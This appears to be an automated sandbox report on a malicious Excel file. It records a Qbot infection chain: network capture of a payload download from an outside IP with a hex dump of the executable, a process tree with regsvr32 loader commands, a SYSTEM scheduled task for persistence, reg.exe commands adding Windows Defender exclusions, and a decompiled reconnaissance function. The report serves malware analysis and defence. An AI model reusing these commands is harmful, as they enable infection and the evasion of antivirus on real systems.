Sep 27, 2021 21:19:31.773526907 CEST	14	IN	Data Raw: ff b3 51 5a 43 00 ff b3 65 56 43 00 6a 4c ff b3 40 59 43 00 6a 00 6a 00 ff 93 a0 10 44 00 50 8f 45 f4 ff 75 f4 8f 83 a0 59 43 00 31 c0 8b 04 e4 83 ec fc 50 8f 45 f4 ff 75 f4 8f 83 56 54 43 00 ff b3 80 52 43 00 8f 45 f8 ff 75 f8 59 55 89 cd 81 c5 Data Ascii: QZCeVCjL@YCjjDPEuYC1PEuVTCRCEuYU]QYCu2QXCPlDM+M1YCYCM6WC,QUCu%PCPlDu1UCUCuPCjXCuYCPhDj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	185.183.96.67	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 21:19:49.424195051 CEST	409	OUT	GET /44466.8890891204.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.183.96.67 Connection: Keep-Alive
Sep 27, 2021 21:19:49.696156979 CEST	410	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 19:19:49 GMT Content-Type: application/octet-stream Content-Length: 387072 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44466.8890891204.dat" Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p\| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP
Sep 27, 2021 21:19:49.696285009 CEST	411	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 55 89 e5 83 c4 f8 e8 2e 36 00 00 3b d8 0f 84 46 02 00 00 60 03 fb 41 03 c8 50 51 68 25 01 00 00 83 bb fe 53 43 00 00 75 3a 68 00 20 00 00 68 0b 01 00 00 6a 77 6a 3b ff b3 Data Ascii: jU.6;F`APQh%SCu:h hjwj;YC~SCPCDU+,1SC1SC]^TCTYCuXDu1TYCuTChYCIXCu!YCPlDR+1IXCIXCZjKZCBSCu
Sep 27, 2021 21:19:49.696330070 CEST	413	IN	Data Raw: 43 00 68 f8 00 00 00 68 d7 01 00 00 ff b3 22 54 43 00 ff b3 af 51 43 00 6a 01 6a 00 ff 93 a0 10 44 00 89 75 f8 31 f6 09 c6 89 b3 0c 59 43 00 8b 75 f8 8d 83 d2 54 43 00 50 6a 40 83 bb 68 59 43 00 00 75 1a ff 93 58 10 44 00 51 2b 0c e4 09 c1 83 a3 Data Ascii: Chh"TCQCjjDu1YCuTCPj@hYCuXDQ+hYChYCYbTCTCPPCPDDj1YCYPC<D;tifSCu!WCPhDW1fSC1fSC_NWCRCHRCu%XCPdDU3UHRC
Sep 27, 2021 21:19:49.696373940 CEST	414	IN	Data Raw: 83 bb 5e 51 43 00 00 75 36 50 51 ff b3 be 53 43 00 ff 93 a4 10 44 00 6a 00 89 14 e4 31 d2 09 c2 89 93 5e 51 43 00 5a 81 e1 00 00 00 00 0b 0c e4 83 c4 04 81 e0 00 00 00 00 8f 45 f8 33 45 f8 03 4d 0c 53 89 cb 33 5d 08 89 d9 5b 83 bb ce 54 43 00 00 Data Ascii: ^QCu6PQSCDj1^QCZE3EMS3][TCuf,UCu1PQlXCPdDj,)1,UC]EEPQWCPlDPEuTC)3);Mv?QCu3PQSCPdDj1QCY
Sep 27, 2021 21:19:49.696414948 CEST	416	IN	Data Raw: bb 13 53 43 00 00 75 27 50 ff 93 60 10 44 00 89 75 e4 83 e6 00 31 c6 83 a3 13 53 43 00 00 09 b3 13 53 43 00 8b 75 e4 31 c0 0b 04 e4 83 ec fc 89 7d e4 29 ff 09 c7 89 bb a8 50 43 00 8b 7d e4 83 bb 84 58 43 00 00 75 3b 68 00 10 00 00 6a 4b ff b3 49 Data Ascii: SCu'P`Du1SCSCu1})PC}XCu;hjKIUC<PCTCUCUCD}1XC}}UCu$pYCpDM+MUCUCMUVCuAXDM1UVC1UVCMTCujj
Sep 27, 2021 21:19:49.696455956 CEST	417	IN	Data Raw: 44 00 57 2b 3c e4 09 c7 83 a3 3f 52 43 00 00 09 bb 3f 52 43 00 5f 31 c0 0b 04 e4 83 c4 04 56 33 34 e4 09 c6 83 a3 b0 52 43 00 00 09 b3 b0 52 43 00 5e 83 bb b3 51 43 00 00 75 26 ff b3 a9 56 43 00 ff b3 78 59 43 00 ff 93 a8 10 44 00 51 83 e1 00 09 Data Ascii: DW+<?RC?RC_1V34RCRC^QCu&VCxYCDQQC1QCYEU1SCu7QRRCPhD}+}SCSC}1)RQV34u1^LRCu'P\DULRC1LRCU)EESC
Sep 27, 2021 21:19:49.696495056 CEST	418	IN	Data Raw: 8d 83 d2 54 43 00 50 6a 02 52 83 bb 10 50 43 00 00 75 1e ff 93 58 10 44 00 89 75 f8 83 e6 00 31 c6 83 a3 10 50 43 00 00 31 b3 10 50 43 00 8b 75 f8 57 ff 93 3c 10 44 00 81 e7 00 00 00 00 8f 45 f8 03 7d f8 83 bb c6 54 43 00 00 75 1e ff 93 58 10 44 Data Ascii: TCPjRPCuXDu1PC1PCuW<DE}TCuXDu3u1TC1TCuU]WQMY]3_]QPCP]XCPDDW1RCRC_wPCDYCu!ZCPTDu)
Sep 27, 2021 21:19:49.696592093 CEST	420	IN	Data Raw: 84 00 00 00 83 bb 68 58 43 00 00 75 36 68 00 10 00 00 68 e2 00 00 00 68 ef 01 00 00 ff b3 90 50 43 00 ff b3 84 52 43 00 6a 01 ff b3 0d 5a 43 00 ff 93 a0 10 44 00 50 8f 45 f0 ff 75 f0 8f 83 68 58 43 00 8d 83 69 55 43 00 50 ff 93 68 10 44 00 89 75 Data Ascii: hXCu6hhhPCRCjZCDPEuhXCiUCPhDu11QCuTCP6QCPDDU3,zSC1zSC]XYCu!4UCPdDUXYC1XYC]}?3RCu jD}+}13RC13RC}
Sep 27, 2021 21:19:49.696630955 CEST	421	IN	Data Raw: 14 00 00 00 89 cf 59 83 3f 00 0f 85 74 fb ff ff 83 bb 26 54 43 00 00 75 1c 6a 00 ff 93 70 10 44 00 56 33 34 e4 09 c6 83 a3 26 54 43 00 00 31 b3 26 54 43 00 5e 83 7f 10 00 0f 85 45 fb ff ff 56 89 c6 31 c6 89 f0 5e 29 f6 33 34 e4 83 ec fc 29 ff 0b Data Ascii: Y?t&TCujpDV34&TC1&TC^EV1^)34)<UVWPCEE3E3EERZu9<S33_4[u)E])]]GU]U1UPXu]3]_]EE
Sep 27, 2021 21:19:49.696671963 CEST	422	IN	Data Raw: 10 44 00 50 8f 45 f8 ff 75 f8 8f 83 5a 54 43 00 ff 76 08 83 bb 98 58 43 00 00 75 25 8d 83 90 52 43 00 50 ff 93 6c 10 44 00 89 7d f8 83 e7 00 09 c7 83 a3 98 58 43 00 00 31 bb 98 58 43 00 8b 7d f8 57 83 bb d8 58 43 00 00 75 18 6a 00 ff 93 70 10 44 Data Ascii: DPEuZTCvXCu%RCPlD}XC1XC}WXCujpDj11XCZVTCu}UCujpDWUC1UC_jDYCu:PZCQZCeVCjL@YCjjDPEuYC1PEuVTCRCE
Sep 27, 2021 21:19:49.724301100 CEST	424	IN	Data Raw: 0f 86 4d 02 00 00 83 bb b6 54 43 00 00 75 43 68 00 04 00 00 ff b3 98 52 43 00 ff b3 7e 57 43 00 6a 0d ff b3 a1 55 43 00 ff b3 12 54 43 00 ff b3 88 50 43 00 ff 93 a0 10 44 00 89 7d f8 2b 7d f8 09 c7 83 a3 b6 54 43 00 00 31 bb b6 54 43 00 8b 7d f8 Data Ascii: MTCuChRC~WCjUCTCPCD}+}TC1TC}uEu_Wj4)w^PCu&QUCPhDj,11PC])]3_1]YVCu2PQ`D}1YVC1YVC}E3MEEQQu3u1

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2812 Parent PID: 596

General

Start time:	21:20:13
Start date:	27/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f290000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 2516 Parent PID: 2812

General

Start time:	21:21:20
Start date:	27/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd.red
Imagebase:	0xff7b0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2852 Parent PID: 2516

General

Start time:	21:21:20
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-silent ..\Drezd.red
Imagebase:	0x770000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.543038317.0000000000440000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 1172 Parent PID: 2852

General

Start time:	21:21:22
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xeb0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2968 Parent PID: 2812

General

Start time:	21:21:23
Start date:	27/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd1.red
Imagebase:	0xff7b0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2556 Parent PID: 1172

General

Start time:	21:21:24
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35
Imagebase:	0x980000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2528 Parent PID: 2968

General

Start time:	21:21:24
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-silent ..\Drezd1.red
Imagebase:	0x5f0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.551759186.0000000000190000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 236 Parent PID: 2528

General

Start time:	21:21:26
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xeb0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 672 Parent PID: 1672

General

Start time:	21:21:26
Start date:	27/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Drezd.red'
Imagebase:	0xff7b0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1500 Parent PID: 672

General

Start time:	21:21:27
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Drezd.red'
Imagebase:	0x5f0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.559785788.0000000000270000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 804 Parent PID: 2812

General

Start time:	21:21:28
Start date:	27/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd2.red
Imagebase:	0xff7b0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 1308 Parent PID: 1500

General

Start time:	21:21:29
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xeb0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000F.00000002.819617621.0000000000080000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 1684 Parent PID: 1308

General

Start time:	21:21:31
Start date:	27/09/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Krngnamoimcp' /d '0'
Imagebase:	0xffca0000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 536 Parent PID: 1308

General

Start time:	21:21:33
Start date:	27/09/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Waizacawzvcu' /d '0'
Imagebase:	0xff060000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2072 Parent PID: 1672

General

Start time:	21:23:00
Start date:	27/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Drezd.red'
Imagebase:	0xff6c0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2312 Parent PID: 2072

General

Start time:	21:23:00
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Drezd.red'
Imagebase:	0x7a0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2852 Parent PID: 2516 regsvr32.exeCOMMON

Executed Functions

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x2e1faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x2e1fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x2e1faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x2e1faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x2e1faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x2e1faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x2e1faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x2e1faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

0x1000d01f
0x1000d029
0x1000d035
0x1000d03a
0x1000d03f
0x1000d3ff
0x1000d3ff
0x1000d04c
0x1000d052
0x1000d057
0x1000d05d
0x1000d06d
0x1000d079
0x1000d079
0x1000d082
0x1000d088
0x1000d08a
0x1000d093
0x1000d093
0x1000d09f
